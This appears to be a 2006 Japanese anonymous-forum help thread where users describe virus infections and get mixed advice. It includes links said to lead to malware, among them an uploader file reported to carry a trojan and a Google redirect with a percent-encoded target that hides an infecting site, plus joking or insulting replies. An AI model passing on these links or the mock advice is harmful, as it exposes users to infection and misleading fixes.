ご親切にレス頂き、ありがとうございました!

159 :名無しさん@お腹いっぱい。:2006/05/19(金) 21:56:00
RecoveryBinってウィルスですよね?

160 :名無しさん@お腹いっぱい。:2006/05/20(土) 01:07:51
すいません。
もしわかる方がいたら教えていただきたいのですが、
リンク先がかならずGoogleにつながってしまうのですが、
これはウィルスが原因なのでしょうか。
もし対処方を知ってる方がいたら教えていただけますでしょうか。

161 :名無しさん@お腹いっぱい。:2006/05/20(土) 03:31:23
http://www.msn.co.jp/home.armx
これ踏んでもぐーぐる?

162 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:13:15
http://up2.viploader.net/mini/src/viploader37692.lzh.html

に「Uploader-AA」というウイルスがあるらしいのですが
どうやって削除すればいいんでしょうか?ノートンじゃ反応してくれません…

163 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:35:44
VIPから突撃依頼が出たのできました

164 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:36:24
>>162
しね

165 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:38:28
VIPから来ました
http://ex14.2ch.net/test/read.cgi/news4vip/1148079615/177-178

177 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2006/05/20(土) 10:27:48.49 ID:pJ+jduf90
>>176
http://pc8.2ch.net/test/read.cgi/sec/1146625920/162

178 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2006/05/20(土) 10:33:34.29 ID:jFMlslsg0
勇気が無くて見られない画像解説スレ Part795
http://etc3.2ch.net/test/read.cgi/entrance/1148034144/93

>>93
Uploader-AA と言うトロイを検出
PC有害だってさ。踏まなかった俺は勝ち組。山田先生やトロイ入りのチートツールで鍛えられたからな。

166 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:41:16
氏ね

167 :名無しさん@お腹いっぱい。:2006/05/20(土) 10:44:14
VIPから来ました
http://ex14.2ch.net/test/read.cgi/news4vip/1148079615/177-178

177 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2006/05/20(土) 10:27:48.49 ID:pJ+jduf90
>>176
http://pc8.2ch.net/test/read.cgi/sec/1146625920/162

178 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2006/05/20(土) 10:33:34.29 ID:jFMlslsg0
勇気が無くて見られない画像解説スレ Part795
http://etc3.2ch.net/test/read.cgi/entrance/1148034144/93

>>93
Uploader-AA と言うトロイを検出
PC有害だってさ。踏まなかった俺は勝ち組。山田先生やトロイ入りのチートツールで鍛えられたからな。

168 :名無しさん@お腹いっぱい。:2006/05/20(土) 12:09:24
俺も>>162踏んじゃったんだけど
駆除するにはどうすれば?

169 :名無しさん@お腹いっぱい。:2006/05/20(土) 12:35:59
>>168
Regseekerを使う

170 :名無しさん@お腹いっぱい。:2006/05/20(土) 12:52:27
OS再インスト

171 :名無しさん@お腹いっぱい。:2006/05/20(土) 12:52:37
>>168
デフラグをしてみる

172 :名無しさん@お腹いっぱい。:2006/05/20(土) 14:40:12
>>168
ウィルス繁殖専用PCとして大切に培養する

173 :名無しさん@お腹いっぱい。:2006/05/20(土) 19:09:24
のーとんで検出したけど削除できないウイルスはどうやって始末しますか?
ダウンロードトレジャン?とかいう奴なんですが

174 :名無しさん@お腹いっぱい。:2006/05/20(土) 19:31:39
>>173
馬のアンチユーザですが、゙エラーサーヂなるウィルスが出ました、OSはXPのSP1です 見るどシステムとレジストに深刻な被害を生ずる…゙と有るんですが、マイソの悪意あるを調べましたが出てませんがこれは?

175 :名無しさん@お腹いっぱい。:2006/05/20(土) 19:35:16
>>174 追伸、馬はマカ不意の事で、マイソフの悪意あるウィルスも調べましたが該当なしでした。

176 :名無しさん@お腹いっぱい。:2006/05/20(土) 19:45:27
banpthe@hotmail.com

こちらのメルアドにメールを送るとエラーが出てちゃんと送れません
何が原因なのでしょうか?


177 :名無しさん@お腹いっぱい。:2006/05/20(土) 20:03:32
ネタ質フォー!
【使用OS】 WindowsXP SP2 (ブラウザ:IE6 SP2)
【WindowsUpdateしてるか】 Sir,Yes Sir!
【AntiVirusは何を使っているか】 WinAntiVirus PRO 2006/WinFixer 2006/ErrorSafe
【ちゃんとUpdateしてるか】 Sir,Yes Sir!
【スキャンした結果(ウイルス名・発見場所)】 いくつか見つかるけど誤検出w
【別のオンラインスキャンしたならその結果は】 Trojan-ZlobとかAd-Wareとかのマルウェアが
「WinAntiVirus PRO 2006/WinFixer 2006/ErrorSafe」等から多数検出、
【症状を具体的に、分かる限りすべて書く】 BSOD連発。PCの処理に時間がかかる。CPUが100%から解放されない。
起動時間も10分を超えた。広告のポップアップも数倍に増幅。等々
【何をしたらそんなことになったのか】 PCの起動時間を現在の3分40秒から1分以内に短縮したくて、
F-Secureインターネットセキュリティ2006を削除→上記の『セキュリティ"対策"ソフト』を購入→インストール
【これまでにとった措置】 カード会社に連絡→クレジットカード番号の変更、
禁断のテンプレを通常モードとセーフモード(Administrator権限)で実行したが失敗に終わった。
【その他の質問】 こんな典型的なインチキソフトをインストールしてしまうなんて、
ボクは…騙されてしまったのでしょうか?

178 :名無しさん@お腹いっぱい。:2006/05/20(土) 20:49:08
すいませんおしえて下さい。
数日前から急にNorton Internet SecurityとNorton Anti Virusをoffにしてたら
「セキュリティ警告」ってのがポップアップ広告みたいに出るようになってしまいました、
消しても消しても出てきます。これどうやったら出ないようにできますか?


179 :名無しさん@お腹いっぱい。:2006/05/20(土) 20:55:39
ウイルスに感染したようです
起動してデスクトップの画面になるとビジー状態という表示がでてフリーズします。
それと蝿とゴキブリの画像がデスクトップ上で動くんです。
どうしたらいいでしょうか?

180 :名無しさん@お腹いっぱい。:2006/05/20(土) 22:12:37
突然、画面が下に下にスクロールするようになりました。
どのアプリを使っていてもなるのです。
これはウイルスの仕業でしょうか???
もしウイルスなら駆除の方法を教えてください。
こうやって書き込み文を書いていても下にスクロールしていく・・・・。


181 :名無しさん@お腹いっぱい。:2006/05/20(土) 22:23:06
>>1-180
諦めましょう。このスレの住人に期待するだけ無駄です。

182 :名無しさん@お腹いっぱい。:2006/05/20(土) 22:51:59
>>178
onにする
>>179
ジョークソフト、ウィルスでぐぐる
>>180
オンラインスキャンしてみる
>>181
気休めです

183 :名無しさん@お腹いっぱい。:2006/05/21(日) 03:41:06
>>181
少なくともお前には期待してないから問題なし

184 :180:2006/05/21(日) 10:26:38
182さんコメントありがとうございました。
オンラインスキャンでなにも反応なしでした・・。
ってことはウイルスじゃないんだろうか・・・。鬱

185 :名無しさん@お腹いっぱい。:2006/05/21(日) 15:26:26
>>184
ん〜、じゃあ
キーボードのスペースキーの不具合を疑ってみる

186 :名無しさん@お腹いっぱい。:2006/05/21(日) 17:55:15
>>161

ありがとうございます。
それは大丈夫みたいです。
おそらく海外のあるサイトだけみたいです。

187 :名無しさん@お腹いっぱい。:2006/05/21(日) 20:25:52
↓キーの不具合も疑ってみる

188 :名無しさん@お腹いっぱい。:2006/05/21(日) 20:39:03
じゃあおれはPageDownキーで

189 : ◆N9P3SuvBPo :2006/05/21(日) 21:15:01
Tabキー
Endキー
__
| 2 |
|↓ | キー
 ̄ ̄

190 :名無しさん@お腹いっぱい。:2006/05/22(月) 04:57:03
特になんのファイルも保存してないのに
仕様ドライブ領域が少しずつ増えていってるのですが
やっぱりウィルスなんですか?

191 :名無しさん@お腹いっぱい。:2006/05/22(月) 07:14:08
>>190
検索→「ファイルやフォルダ」→「詳細設定」→「日付」で確認

192 :名無しさん@お腹いっぱい。:2006/05/22(月) 14:46:45
>>190
>ウィルスなんですか?
ウィルススキャンしろ

193 : ◆N9P3SuvBPo :2006/05/22(月) 18:20:02
>190
どう言ったらいいのか、これってシステムの復元ポイントが作成されてることに
何か関係があるんじゃ。

194 :名無しさん@お腹いっぱい。:2006/05/23(火) 00:08:25
【使用OS】 windows XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】未購入です。検討する為に各社のオンラインスキャンを実行中にノートン版で検出
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 Bloodhound.Exploit.6
VBS.Internal 両方ともIEのテンポラリーファイルの中からです。
【別のオンラインスキャンしたならその結果は】 ウイルスバスターオンライン版では検出せず
【症状を具体的に、分かる限りすべて書く】 特に現状では把握できない範囲です。
【何をしたらそんなことになったのか】 わかりません。
【これまでにとった措置】 ノートンNIS2006の体験版をダウンロードしました。が、アップロードした上でスキャンしても検出しません。再びオンラインスキャンすると検出されます。
【その他の質問】 ノートンのサポートを利用したいのですが、購入しないとサポートサービスが受けられないようです。
体験版では検出できないので、このまま購入するべきか迷っています。

195 :名無しさん@お腹いっぱい。:2006/05/23(火) 00:12:21
>>194
http://pc8.2ch.net/test/read.cgi/sec/1146946279/864

196 :名無しさん@お腹いっぱい。:2006/05/23(火) 00:33:02
なんだマルチか

197 :194:2006/05/23(火) 01:16:40
申し訳ないです。
あっちは質問した後になってスレ違いのような気がしたので、
こちらに質問し直しました。

198 :名無しさん@お腹いっぱい。:2006/05/23(火) 11:17:27
なんかイランの核がどうたらいうSPAMが来て、試しにリンク
押してみたらEXPL_TXTRANGE.Aとか出てきた。なんだろこれ。

199 :名無しさん@お腹いっぱい。:2006/05/23(火) 11:30:05
あるexeファイルを開いてしまい不当請求されています
その際にウィルスやらなにやら潜り込ませているかも知れないと言われました
確認するにはどうしたら良いのでしょうか?お願いします。

200 :名無しさん@お腹いっぱい。:2006/05/23(火) 11:30:30
>>198
ゼロデイ攻撃
つttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=EXPL_TXTRANGE.A

201 :名無しさん@お腹いっぱい。:2006/05/23(火) 11:31:08
>>199
スキャン

202 :名無しさん@お腹いっぱい。:2006/05/23(火) 13:17:39
>>199
あるexeって・・・
助けてほしいが自分から情報は一切出さないって事?

203 :194:2006/05/23(火) 13:29:56
どなたか助けてください。
マルチになってしまった件は大変申し訳なかったです。

体験版では検出すらできなかったのですが、
サポートに電話しても、購入しないかぎりサポート情報は出せませんと言われました。
検出すら出来ない体験版
購入したら検出できるのか?と
その辺聞きたかったけど、無料はサポートできないの一点張りでした。
性能的に、オンラインスキャン=購入版>体験版ってことなのでしょうか?


204 :名無しさん@お腹いっぱい。:2006/05/23(火) 13:40:11
>>202
ごめんなさい
あるアダルトサイトでなんですけどアドレス貼ったほうが良いでしょうか?
ちなみに今スキャンしてみるとVBS.LoveLetter.AとWScript.KakWormというのがが引っかかりました。

205 :名無しさん@お腹いっぱい。:2006/05/23(火) 13:46:17
続けてごめんなさい
上の二つのウィルスはメールから感染するものなんでしょうか


206 :名無しさん@お腹いっぱい。:2006/05/23(火) 14:08:19
>>203
Temporary Internet Files(一時ファイル)からしか出てないなら問題ない。
IE ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
で出てこなくなる

しかもそれって多分、2ちゃんのウイルスコードに反応したものだからノートンの誤検出かと・・・
ノートントラップでググルとよく解る。よってわざわざ買う必要無し。

もうマルチは止めた方がいいぽ

207 :194:2006/05/23(火) 14:17:50
>>206
レス大変感謝致します。
マルチは本当にすいませんでした。以後は書き込む前に十分気をつけます。

Temporary Internet Filesのことなのですが、
インターネットオプション→インターネット一時ファイル、ファイルの削除
これで確かにtemporary Internet Filesの中身は消えるのですが、
Temporary Internet Filesって2つありますよね。
インターネットオプションから開くTemporary Internet Filesと、
そのフォルダから上に行ったところにあるtempフォルダの中にも。
今回はそちらのほうから検出され、インターネットオプションのファイル削除では消せません。
tmep→Temporary Internet Files→content.IE5というフォルダ→WDKDCTMPというフォルダの中に入ってます。
これを手動で削除しろということでよろしいでしょうか。


208 :名無しさん@お腹いっぱい。:2006/05/23(火) 14:20:29
>>205
二つともメールを介して感染する。
Googleで見れば危険性は良くわかる。
メール停止、至急ウイルス対策ソフトを買う。



209 :名無しさん@お腹いっぱい。:2006/05/23(火) 14:44:26
>>207
うm。ただ一時ファイルだし誤検出だし放って置いても問題ないよ。
それにウイルスコードに遭遇するたびその一時ファイルはできるよーな( ̄▽ ̄;)

210 :207:2006/05/23(火) 15:56:25
>>209
レス感謝します。
削除はしました。
そうなんですか・・・
なんか、ひとつはトロイの木馬扱いだったので、やっぱり誤検出でも気になります・・・
ノートンがその辺改善してほしいですね。
度々返答ありがとうございました。


211 :名無しさん@お腹いっぱい。:2006/05/23(火) 16:03:42
【使用OS】 XP
【WindowsUpdateしてるか】yes
【AntiVirusは何を使っているか】 AVGFree
【ちゃんとUpdateしてるか】 Yes
【スキャンした結果(ウイルス名・発見場所)】 スキャンができない
Winnyで落としたRARファイルなんだが、スキャン自体ができない。(スキャンの画面すらでない
他のファイルだと問題なくスキャンできる。
スキャン方法は対象のファイルの右クリから。
なんでそんなことがおこるのか、考えられる理由はなんざんしょ?

212 :名無しさん@お腹いっぱい。:2006/05/23(火) 16:05:49
>>211
>>1

213 :名無しさん@お腹いっぱい。:2006/05/23(火) 17:23:54
ウイルスと何か関係ありそうなの、それ?

214 :名無しさん@お腹いっぱい。:2006/05/23(火) 18:46:26
お前ら頭悪すぎ・・・w

215 :名無しさん@お腹いっぱい。:2006/05/23(火) 19:03:58
はいはい、頭いい頭いい

216 :名無しさん@お腹いっぱい。:2006/05/23(火) 20:01:42
>>211
適当なフォルダに放り込んでフォルダごとスキャンしたら?

217 :名無しさん@お腹いっぱい。:2006/05/23(火) 20:50:55
はじめまして、パソコンは使うだけでシステムなどは超初心者です。
使っているパソコンはバイオで、昨年夏に購入したもののあまり使っていなかったせいもあり
セキュリティは無料お試し版の期限が切れたまま使っていました。
(インターネットセキュリティは利用できているようですが、アンチウィルスが切れたまま)

昨日の夜位から、ノートンのウィルス警告で”wscript.kakworm”(高危険度)が出てくるようになりました。
それで慌てて無償のウィルスチェック等を試しましたが、検知できませんでした(>_<)
今日また警告が出たので更にチェックを試してみたんですが、やっぱり検知できずでした。

考えてみたところ、通常のインターネット利用では警告が出てこず、Yahooメールなどを使っている時に
出てくる事が多かったように思います。
ちなみに先程一度切断して接続しなおしてからはまだ警告は出てきていません。

私はこれから何をするべきでしょうか!?自分が無知であった為なのですがとても不安です。
アドバイス、どうぞ宜しくお願いいたします<(_ _)>


218 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:08:10
>>217
買え!・・・だけど、とりあえずは
オンラインスキャンでも>2

219 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:09:01
>>217
アンチウイルスを買うか、そのまま。
ほとんど使って無いなら大したデータも入ってないんだろうし、
そのままでも良いかも。
どうせこれからも使わないんでしょ?

220 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:18:50
217です。

それがこの最近かなり使っていて、デスクトップとかに個人情報
ありまくりでorz はげしく心配です。

警告が出るのに何故オンラインスキャンで出ないのか謎です。
新しいウイルスではないようなのに…(つд∩)

でも感染してるって事ですよね?
質問ばかりですみません…

221 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:19:40
【使用OS】XP SP1
【WindowsUpdateしてるか】してないです
【AntiVirusは何を使っているか】期限が一年ほど切れたノートン
【ちゃんとUpdateしてるか】上記の通り
【スキャンした結果(ウイルス名・発見場所)】異常が見つかりませんでした
【別のオンラインスキャンしたならその結果は】してないです
【症状を具体的に、分かる限りすべて書く】
・起動時におかしな効果音が鳴る
http://www.viplog.net/desktop/src/1148386221608.jpg
こんな物が表示される
・Cドライブの残り容量が変わる(さっきサムライズでの表示が残り0Gになりました)
・起動時にかってにネットに接続される
・勝手に画面の解像度が変わる


【何をしたらそんなことになったのか】特に思い当たる節は無いです
【これまでにとった措置】ノートンでスキャン、Ad-Aware SE Personalでスキャン

何かウイルスに感染しているのでしょうか?
なんか怪しすぎな効果音が流れてるあたり非常に怖いのですが・・・


222 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:21:27
>>221
とりあえずオンラインスキャンしたら?

223 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:23:34
>>220
警告だけで感染はしてないのでは?
Wscript.KakWormは古いタイプなので
一年前のアンチウイルスでも対応してるはず。

心配ならこれからちゃんとしたアンチウイルス使えば。


224 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:26:23
>>222
わかりました
してみます
どれでも同じですかね?

225 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:27:36
>>224
タダなんだから全部やる。

226 :名無しさん@お腹いっぱい。:2006/05/23(火) 21:48:27
>>217
何事も自分で判断できないならPCなんぞ使うな!!!

227 :名無しさん@お腹いっぱい。:2006/05/23(火) 22:15:30
>>226
あなたには聞いてないです。

>>218 >>219 >>223 ありがとうございました<(_ _)>


228 :名無しさん@お腹いっぱい。:2006/05/24(水) 00:47:29
良い根性してるなw

229 :名無しさん@お腹いっぱい。:2006/05/24(水) 04:28:11
前も居たな・・・こういう人

230 :名無しさん@お腹いっぱい。:2006/05/24(水) 06:02:12
3日もすればまた罹るさ

231 :名無しさん@お腹いっぱい。:2006/05/24(水) 16:51:32
age

232 :名無しさん@お腹いっぱい。:2006/05/27(土) 00:02:10
【使用OS】
Windows XP
【WindowsUpdateしてるか】
自動更新
【AntiVirusは何を使っているか】
SGアンチスパイ
【スキャンした結果(ウイルス名)】
Trojan-Dropper.Win32.Small.amw
Trojan-Downloader.BAT.Ftp.z
【別のオンラインスキャンしたならその結果は】
ウイルスバスター 異常なし
【症状を具体的に、分かる限りすべて書く】
目に見えた症状は特にありません。
【何をしたらそんなことになったのか】
DL。動画、フリーソフト。
【これまでにとった措置】
SGアンチスパイ 「隔離」から「削除」その後、詳細スキャン。
【その他の質問】
削除した後の詳細スキャンでは何も異常は見当たりません。
バックドア型だったりしたら、その後のケアも必要なんですよね?
いいサイトの情報など教えてください。よろしくお願いします。

233 :名無しさん@お腹いっぱい。:2006/05/27(土) 00:09:50
SGアンチスパイのスレで聞いたら?

234 :名無しさん@お腹いっぱい。:2006/05/27(土) 00:15:44
【使用OS】 win XP SP2
【WindowsUpdateしてるか】 してる。
【AntiVirusは何を使っているか】 ウィルスバスター2005
【ちゃんとUpdateしてるか】 してる。
【スキャンした結果(ウイルス名・発見場所)】 VBS_REDLOF.A-11ですが、スキャンでは
出てきませんでした。(踏んだときのみ。感染ファイルはキャッシュ内のhtmファイル)
【別のオンラインスキャンしたならその結果は】 していない。
【症状を具体的に、分かる限りすべて書く】 現状では特になにも。
【何をしたらそんなことになったのか】 レドロフに感染しているページを開いて
しまい、バスターで「隔離できなかったので、手動で削除する必要があります」と
出ました。
【これまでにとった措置】 キャッシュの削除。削除後も削除前もウィルススキャンで
ウィルスは検索されませんでした。(ウィルスページを開いたときに警告が
出たのみ)。
【その他の質問】 手動で削除、とのことですが、キャッシュを削除する以外に何か
すべきことはあるのでしょうか。今までバスターでウィルスを隔離→駆除していたので
隔離できなかったときにどうすればいいのかよくわかりません。

235 :名無しさん@お腹いっぱい。:2006/05/27(土) 07:40:09
>>234
そのままほっといておk

236 :名無しさん@お腹いっぱい。:2006/05/27(土) 14:40:47
>>234
ググレよ池沼が

237 :名無しさん@お腹いっぱい。:2006/05/27(土) 21:39:51
ここで ググレカス登場 ↓

238 :名無しさん@お腹いっぱい。:2006/05/27(土) 22:46:29
【使用OS】 XP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 ウィルスバスター2005
【ちゃんとUpdateしてるか】 してない
【スキャンした結果(ウイルス名・発見場所)】 してない
【別のオンラインスキャンしたならその結果は】 してない
【症状を具体的に、分かる限りすべて書く】
フォルダのアイコン画像のexeを生成するもので。
正常な別のアプリファイルの名前+4桁のアルファベットと
数字の組み合わせたもの.exeで同じフォルダ内に
つくられるみたいです。サイズと日時が必ず同じで432.128バイト、
作成日時と更新日時が2001年01月1日0:00となっています。
情報が少ないですがウイルス等わからないでしょうか?
【何をしたらそんなことになったのか】 DL
【これまでにとった措置】 隔離

239 :名無しさん@お腹いっぱい。:2006/05/27(土) 23:19:50
>>238
ググレカス

240 :名無しさん@お腹いっぱい。:2006/05/27(土) 23:32:37
てかアップデートして来い

241 :名無しさん@お腹いっぱい。:2006/05/27(土) 23:39:49
>>238
クマー

242 :名無しさん@お腹いっぱい。:2006/05/28(日) 00:21:38
>>240
自宅PCはオフラインなので更新できないんです。

243 :名無しさん@お腹いっぱい。:2006/05/29(月) 00:18:52
>>242
オンラインにしろボケ

244 :名無しさん@お腹いっぱい。:2006/05/29(月) 22:14:04
>>179
うっかり、同じ症状になった。(蝿とビジー状態)
セーフモードで対象のファイルをフォルダごと削除して、
ショートカットも削除したら問題なく使えてる。
オンラインチェックも問題ないみたい。
なんかわすれてる?

245 :名無しさん@お腹いっぱい。:2006/05/30(火) 17:12:59
【使用OS】
 XP sp1
【WindowsUpdateしてるか】
 自動更新で
【AntiVirusは何を使っているか】
 Avast!
【ちゃんとUpdateしてるか】
 している
【スキャンした結果(ウイルス名・発見場所)】
 Avast!では脅威なしでした。
【別のオンラインスキャンしたならその結果は】
 トレンドマイクロ:脅威なし
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
 ネットで拾ったBuBuTWというソフトを実行したのですが、そのときからProject1というタスクが表示され、
 これがあると勝手にスタンバイに移行してしまいます。
 一度終了すれば以後普通に使えているのですが、PC起動時にも勝手に起動しているので困っています。
 スタートアップにも登録はされていないのでもしかしたらウィルスなのではないでしょうか。
【その他の質問】

246 :名無しさん@お腹いっぱい。:2006/05/30(火) 18:03:50
XP sp1って・・・更新されてないじゃん
sp2になってないの?

インスコしたBuBuTWアンインスコしてもだめなら、
システムの復元でインスコする前の日付に戻してみな

247 :名無しさん@お腹いっぱい。:2006/05/30(火) 19:05:59
PC初心者に近いんですが…海外サイトでウイルスに感染したのか、インターネットが開けなくなっちゃったんです(>_<)どうしたらいいのか何一つとして分からないです…PC買い替えなきゃいけないんですか??(ρ_;)
聞くスレここで良かったでしょうか??

248 :名無しさん@お腹いっぱい。:2006/05/30(火) 19:11:42
PC初心者
http://pc7.2ch.net/pcqa/

249 :名無しさん@お腹いっぱい。:2006/05/30(火) 19:23:20
>>247
>PC買い替えなきゃいけないんですか??(ρ_;)
マジレスするとそんなことはない。
このスレでまともな回答がほしいなら>>1を読んでくれ。

250 :名無しさん@お腹いっぱい。:2006/05/30(火) 20:41:24
ウイルスバスターを入れてる者なんですが、こんな表示が出て困っています

リアルタイム検索中にウイルス/スパイウェアが見つかったため、
自動的に処理しました。
ファイル名: C:\System Volume Information
\_restore{B7D0B1ED-26CF-470F-A992-3EBB4CF7AB81}\RP545\A0091529.dll

手動で処理せよとの指示が出ているんですが、 cドライブを見てもSystem Volume Information
なるフォルダがどうしても見つかりません。
対策方法をご存知な方がいらっしゃれば、教えてください。

251 :名無しさん@お腹いっぱい。:2006/05/30(火) 20:51:28
>>250
ググレよ

252 :名無しさん@お腹いっぱい。:2006/05/30(火) 23:15:35
>>250
ttp://www.ahnlab.co.jp/faq/faq_virus.asp
問1の所をやってみたら?

253 :名無しさん@お腹いっぱい。:2006/05/31(水) 01:48:49
>>249サン>>1の意味が分かりません…↓初心者のとこに行ってみますありがとうございます

254 :名無しさん@お腹いっぱい。:2006/05/31(水) 02:24:54
>>253
>>1のテンプレを使って質問してくれってこと

255 :名無しさん@お腹いっぱい。:2006/05/31(水) 08:10:06
テンプレってなんですか?

256 :名無しさん@お腹いっぱい。:2006/05/31(水) 11:28:40
>>255
通りすがりですが、
>>1のテンプレとは、
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

257 :名無しさん@お腹いっぱい。:2006/05/31(水) 12:28:23
ここまでくると親切とか言うより廃人相手にしてる感じがする

258 :名無しさん@お腹いっぱい。:2006/05/31(水) 16:01:40
>>255
定食と丼があります

259 :名無しさん@お腹いっぱい。:2006/05/31(水) 16:27:04
小柱の丼ください。

260 :名無しさん@お腹いっぱい。:2006/05/31(水) 22:03:15
ttp://www.google.co.jp/search?hl=ja&q=%77%77%77%2E%64%6F%75%62%6C%65%68%2E%66%72%2F%61%75%64%69%6F%2F%69%6E%64%65%78%2E%68%74%6D&btnI

これ踏んじゃったんだけど、トロイに感染したっぽい・・・orz
とりあえずインターネット一時ファイルを削除して
もう一度スキャンしても検出されなかったんで、これで大丈夫かな?

【使用OS】XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】マカフィー
【ちゃんとUpdateしてるか】不明
【これまでにとった措置】インターネット一時ファイルを削除
【その他の質問】アドバイスお願いします

261 :名無しさん@お腹いっぱい。:2006/05/31(水) 22:14:44
>>260
感染したっぽいじゃなくて、なんという名前のがどこから検出されたのか書いてくれ
そうした情報なしに回答者に地雷とわかってるサイト踏ませようとはいい度胸だ

262 :名無しさん@お腹いっぱい。:2006/05/31(水) 22:37:48
>>261
場所は確かTemporary Internet Filesだったと思う
何ていうトロイだったか名前は忘れちゃった、すまねぇ・・・OTZ

263 :名無しさん@お腹いっぱい。:2006/05/31(水) 23:18:18
ちなみに今現在おまいの貼ったページ自体は無害のようだ
そこからリンクされてるページは怪しいにおいたっぷりだが

XPもきっちり最新のパッチ当ててあって
マカフィーもアップデートしてたってんなら様子見でもいいと思うが
心配ならシステムの復元でサイト踏む以前に戻しとけ

264 :名無しさん@お腹いっぱい。:2006/05/31(水) 23:46:30
>>263
ありがとう
とりあえず様子身しときます

265 :名無しさん@お腹いっぱい。:2006/06/02(金) 23:45:23
【使用OS】 WindowsXP HomeEdition
【WindowsUpdateしてるか】 してない。SP1のまま
【AntiVirusは何を使っているか】 AVG Free
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 ウイルス本体は検出自体出来ず。
msconfigのスタートアップに"C:\:滝川クリトリスv4_5.exe"が追加されていたので、
恐らくこの場所にウイルス本体があると思われる。
【別のオンラインスキャンしたならその結果は】
トレンドマイクロとシマンテックがウイルスの本体のコピーを検出した。
本体は検出出来ず。
【症状を具体的に、分かる限りすべて書く】
"C:\:滝川クリトリスv4_5.exe"というファイル名でウイルス本体が存在していて、
PC起動時に自動起動されてレジストリに自身のコピーへの値を追加したり、
自身のコピーを作ったりする。
どんな迷惑活動をするのかは知らない。
この妙な位置に:が入ったファイル名を扱えるファイラーがみつから無い。
【何をしたらそんなことになったのか】
ネットで拾ったexeファイルを実行してしまった
【これまでにとった措置】
レジストリを修復して、ウイルスの自動起動をしない状態には出来た。
(でも本体がPC上に残っているのは不安なので削除したい。)
ウイルスが生成したファイルは、本体以外全て削除した。
トレンドマイクロ・シマンテック・AVGでスキャンして警告が出るものは全て削除した。
今は何の警告も出ない状態になっているが、恐らくウイルス本体を参照出来ていないだけ。
explorer、delコマンド、MFilerで本体の削除を試みたが出来ず。

よろしくお願いします。

266 :名無しさん@お腹いっぱい。:2006/06/02(金) 23:49:57
>>265
>>1

267 :265:2006/06/02(金) 23:53:47
ダウンロード板のほうで聞くべきという事でしょうか?
ではこちらの質問は閉めます。

268 :名無しさん@お腹いっぱい。:2006/06/02(金) 23:58:41
超あせってます、教えてください
画面の左上の隅っこに、黒い固まりができて
汚れか、とおもったら少しずつ大きくなってまつ、、

いま直径2センチくらいに成長しますたが、なんの菌でしょうか?
まりもは何かの惑星みたい ときどき後ろから後光が刺す、、
黒い太陽のまわりを、コロナがかこんでいるみたいになっている

いま二日目で、若干大きくなったように感じます。。
これはウイルスなのでしょうか??

北斗2004ずっといれっぱなしで、アップデートしなかったので、
その菌にやられたと思ってから、慌てて2006にアップグレードしました
ウインドウズはときどきアップデートしてます
ちなみに、2000使ってます。。

269 :名無しさん@お腹いっぱい。:2006/06/02(金) 23:59:23
で、北斗のほうでは、ウイルス無しとのことでした。。

270 :名無しさん@お腹いっぱい。:2006/06/03(土) 00:02:22
------------------------------------------------------------------------------
VDownloader 0.2 (Youtube, Google Video, Grinvi)
http://www.enriquepuertas.com/wp-content/files/vdownloader.zip

1.DL・解凍後、VDownloaderを起動する
2.動画URLを入力してDownloadボタンをクリック
3.AVIまたはMPEGを指定するDialogが出るのでどちらか選んでOKをクリック
4.指定した保存先にDLされた後、自動的にAVIまたはMPEGに変換される

スクリーンショット
http://comunidad.uem.es/myfiles/epuertas/vdownloader02.jpg
-----------------------------------------------------------------------------


このソフトなんだけど、これってウイルスなんですか?
ノートンアンチウイルスでスキャンしても何も検出されないんですが。
下のURLでウイルスだって言われてるんですが。。。
http://pc7.2ch.net/test/read.cgi/streaming/1149072592/285
http://pc7.2ch.net/test/read.cgi/streaming/1149072592/400
http://pc7.2ch.net/test/read.cgi/streaming/1149072592/405-406
http://pc7.2ch.net/test/read.cgi/streaming/1149072592/409
http://pc7.2ch.net/test/read.cgi/streaming/1149072592/419

思いっきり解凍してVDownloader.exeをクリックして起動してしまったんですが、
大丈夫でしょうか?
一応、ソフトの機能どおり、普通にYoutubeから動画をダウンロード、
それをAVIに変換と出来ました。


271 :名無しさん@お腹いっぱい。:2006/06/03(土) 02:05:16
クッキーを手動で削除したのに、スパイウェア削除ソフトが
「トラッキングクッキーを検出した」と反応するのですが、
(クッキーの場所に、もうクッキーが格納されていないのに)
こういうのって、トラッキングクッキーが消されると、
修復しようとするプログラムがトラッキングクッキーと
一緒にどこかの場所に入ってくるんでしょうか?
それとも、クッキーの場所にない所に、トラッキングクッキーを入れられるんでしょうかね?

272 :271:2006/06/03(土) 02:11:19
【使用OS】 winXP2
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 ウィルスバスター
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 cgi-bin.txt.
【別のオンラインスキャンしたならその結果は】 セキュリティ落とすのが怖いのでしてない
【症状を具体的に、分かる限りすべて書く】 クッキーを消してもスパイウェア削除ソフトに反応するのはなぜか
